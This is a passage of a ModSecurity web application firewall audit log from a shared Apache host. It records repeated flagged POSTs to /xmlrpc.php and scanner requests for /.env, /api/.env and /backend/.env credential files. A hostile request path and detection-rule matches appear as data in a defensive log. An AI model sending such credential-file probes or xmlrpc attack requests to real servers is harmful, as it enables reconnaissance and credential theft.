gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --1037e41c-Z-- --7f73792d-A-- [15/Jun/2025:21:06:51.719264 +0530] aE7okhLQPChAjmM6-0ivewAAAAQ 128.199.112.101 44678 127.0.0.1 7081 --7f73792d-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 487 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --7f73792d-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --7f73792d-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (51+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (51+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7okhLQPChAjmM6-0ivewAAAAQ"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750001810774637 944696 (- - -) Stopwatch2: 1750001810774637 944696; combined=2306, p1=363, p2=1510, p3=40, p4=72, p5=201, sr=97, sw=120, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --7f73792d-Z-- --9fec007a-A-- [15/Jun/2025:21:07:51.548464 +0530] aE7ozjNzfFBMRkII6hmiRQAAAAI 128.199.112.101 56696 127.0.0.1 7081 --9fec007a-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 494 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --9fec007a-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --9fec007a-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7ozjNzfFBMRkII6hmiRQAAAAI"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750001870616254 932266 (- - -) Stopwatch2: 1750001870616254 932266; combined=2694, p1=537, p2=1725, p3=42, p4=43, p5=216, sr=138, sw=131, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --9fec007a-Z-- --2979b718-A-- [15/Jun/2025:21:08:51.014584 +0530] aE7pCr59833JshVCMq_SZQAAAAY 128.199.112.101 43556 127.0.0.1 7081 --2979b718-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 492 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --2979b718-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --2979b718-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7pCr59833JshVCMq_SZQAAAAY"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750001930076387 938253 (- - -) Stopwatch2: 1750001930076387 938253; combined=2085, p1=387, p2=1363, p3=36, p4=50, p5=153, sr=104, sw=96, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --2979b718-Z-- --3e80926b-A-- [15/Jun/2025:21:09:51.057494 +0530] aE7pRr59833JshVCMq_SjwAAAAY 128.199.112.101 59076 127.0.0.1 7081 --3e80926b-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 490 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --3e80926b-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --3e80926b-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7pRr59833JshVCMq_SjwAAAAY"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750001990091042 966509 (- - -) Stopwatch2: 1750001990091042 966509; combined=2450, p1=381, p2=1647, p3=45, p4=71, p5=188, sr=108, sw=118, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --3e80926b-Z-- --4f17d340-A-- [15/Jun/2025:21:10:51.607042 +0530] aE7pgl0gAfK4E6yok-jaFgAAAA4 128.199.112.101 49000 127.0.0.1 7081 --4f17d340-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 490 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --4f17d340-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --4f17d340-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7pgl0gAfK4E6yok-jaFgAAAA4"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750002050661829 945269 (- - -) Stopwatch2: 1750002050661829 945269; combined=1893, p1=335, p2=1210, p3=38, p4=49, p5=161, sr=92, sw=100, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --4f17d340-Z-- --3f385b45-A-- [15/Jun/2025:21:11:51.778500 +0530] aE7pvvRzj1BwdxQoarvSegAAAAo 128.199.112.101 34690 127.0.0.1 7081 --3f385b45-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 491 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --3f385b45-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --3f385b45-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7pvvRzj1BwdxQoarvSegAAAAo"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750002110803638 974926 (- - -) Stopwatch2: 1750002110803638 974926; combined=1994, p1=367, p2=1345, p3=19, p4=43, p5=138, sr=104, sw=82, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --3f385b45-Z-- --dfc71135-A-- [15/Jun/2025:21:12:00.307274 +0530] aE7pyN40YvvHR2Fi0mM_sQAAAAk 208.88.73.86 51208 127.0.0.1 7081 --dfc71135-B-- GET /.env HTTP/1.0 Host: padah.cstechns.com X-Real-IP: 208.88.73.86 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept: */* Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="96", "Google Chrome";v="96" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Accept-Encoding: gzip, br, deflate --dfc71135-F-- HTTP/1.1 404 Not Found Last-Modified: Wed, 04 Sep 2024 04:35:16 GMT ETag: "328-62143b366eaa6" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --dfc71135-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "padah.cstechns.com"] [uri "/.env"] [unique_id "aE7pyN40YvvHR2Fi0mM_sQAAAAk"] Stopwatch: 1750002120304503 2829 (- - -) Stopwatch2: 1750002120304503 2829; combined=1671, p1=319, p2=1297, p3=0, p4=0, p5=55, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --dfc71135-Z-- --b6988d46-A-- [15/Jun/2025:21:12:51.314071 +0530] aE7p-txscloMz_lG7ehvQAAAAAM 128.199.112.101 49574 127.0.0.1 7081 --b6988d46-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 500 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --b6988d46-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --b6988d46-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7p-txscloMz_lG7ehvQAAAAAM"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750002170384596 929531 (- - -) Stopwatch2: 1750002170384596 929531; combined=1892, p1=278, p2=1212, p3=33, p4=99, p5=174, sr=80, sw=96, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --b6988d46-Z-- --e808e859-A-- [15/Jun/2025:21:13:51.375474 +0530] aE7qNjNzfFBMRkII6hmjIgAAAAI 128.199.112.101 56162 127.0.0.1 7081 --e808e859-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 498 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --e808e859-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --e808e859-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7qNjNzfFBMRkII6hmjIgAAAAI"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750002230458488 917047 (- - -) Stopwatch2: 1750002230458488 917047; combined=2282, p1=361, p2=1552, p3=41, p4=60, p5=166, sr=103, sw=102, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --e808e859-Z-- --d4f3d761-A-- [15/Jun/2025:21:14:51.079458 +0530] aE7qcwG_OhOIIVz6TXR52gAAAAA 208.88.73.86 36030 127.0.0.1 7081 --d4f3d761-B-- GET /api/.env HTTP/1.0 Host: padah.cstechns.com X-Real-IP: 208.88.73.86 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept: */* Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="96", "Google Chrome";v="96" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Accept-Encoding: gzip, br, deflate --d4f3d761-F-- HTTP/1.1 404 Not Found Last-Modified: Wed, 04 Sep 2024 04:35:16 GMT ETag: "328-62143b366eaa6" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --d4f3d761-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "padah.cstechns.com"] [uri "/api/.env"] [unique_id "aE7qcwG_OhOIIVz6TXR52gAAAAA"] Stopwatch: 1750002291076725 2792 (- - -) Stopwatch2: 1750002291076725 2792; combined=1576, p1=358, p2=1164, p3=0, p4=0, p5=54, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --d4f3d761-Z-- --d4a18d36-A-- [15/Jun/2025:21:14:51.272842 +0530] aE7qcl0gAfK4E6yok-japwAAAA4 128.199.112.101 35896 127.0.0.1 7081 --d4a18d36-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 494 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --d4a18d36-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --d4a18d36-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7qcl0gAfK4E6yok-japwAAAA4"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750002290312489 960408 (- - -) Stopwatch2: 1750002290312489 960408; combined=2081, p1=359, p2=1326, p3=55, p4=59, p5=175, sr=92, sw=107, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --d4a18d36-Z-- --43b39b08-A-- [15/Jun/2025:21:15:31.596626 +0530] aE7qmtxscloMz_lG7ehvqgAAAAM 52.138.219.226 34750 127.0.0.1 7081 --43b39b08-B-- GET /images/stories/admin-post.php HTTP/1.0 Host: www.3econcepts.com X-Real-IP: 52.138.219.226 X-Accel-Internal: /internal-nginx-static-location Connection: close Cookie: wordpress_test_cookie=WP%20Cookie%20check --43b39b08-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://www.3econcepts.com/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 --43b39b08-H-- Message: Warning. String match ".php" at REQUEST_FILENAME. [file "/etc/apache2/modsecurity.d/rules/comodo_free/24_Apps_Joomla.conf"] [line "74"] [id "240000"] [rev "1"] [msg "COMODO WAF: Protecting Joomla folder||www.3econcepts.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "Joomla"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. String match ".php" at REQUEST_FILENAME. [file "/etc/apache2/modsecurity.d/rules/comodo_free/24_Apps_Joomla.conf"] [line "74"] [id "240000"] [rev "1"] [msg "COMODO WAF: Protecting Joomla folder||www.3econcepts.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "Joomla"] [hostname "www.3econcepts.com"] [uri "/images/stories/admin-post.php"] [unique_id "aE7qmtxscloMz_lG7ehvqgAAAAM"] Apache-Handler: proxy:unix:/var/www/vhosts/system/3econcepts.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750002330567550 1029137 (- - -) Stopwatch2: 1750002330567550 1029137; combined=2603, p1=445, p2=2062, p3=0, p4=0, p5=95, sr=129, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --43b39b08-Z-- --13695464-A-- [15/Jun/2025:21:15:51.699222 +0530] aE7qrr59833JshVCMq_TawAAAAY 128.199.112.101 60650 127.0.0.1 7081 --13695464-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 491 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --13695464-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --13695464-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (51+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (51+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7qrr59833JshVCMq_TawAAAAY"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750002350764788 934489 (- - -) Stopwatch2: 1750002350764788 934489; combined=2131, p1=398, p2=1341, p3=44, p4=66, p5=176, sr=118, sw=106, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --13695464-Z-- --b9bff677-A-- [15/Jun/2025:21:16:17.777698 +0530] aE7qyUD4emz4pcZ5aGTiDAAAAAE 208.88.73.86 48970 127.0.0.1 7081 --b9bff677-B-- GET /backend/.env HTTP/1.0 Host: padah.cstechns.com X-Real-IP: 208.88.73.86 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept: */* Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="96", "Google Chrome";v="96" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Accept-Encoding: gzip, br, deflate --b9bff677-F-- HTTP/1.1 404 Not Found Last-Modified: Wed, 04 Sep 2024 04:35:16 GMT ETag: "328-62143b366eaa6" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --b9bff677-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "padah.cstechns.com"] [uri "/backend/.env"] [unique_id "aE7qyUD4emz4pcZ5aGTiDAAAAAE"] Stopwatch: 1750002377774825 2932 (- - -) Stopwatch2: 1750002377774825 2932; combined=1685, p1=369, p2=1258, p3=0, p4=0, p5=58, sr=97, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --b9bff677-Z-- --4e919267-A-- [15/Jun/2025:21:16:51.972617 +0530] aE7q6zNzfFBMRkII6hmjlgAAAAI 128.199.112.101 35716 127.0.0.1 7081 --4e919267-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 488 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --4e919267-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --4e919267-H-- Message: Warning. Operator EQ matched 0 at IP. [file 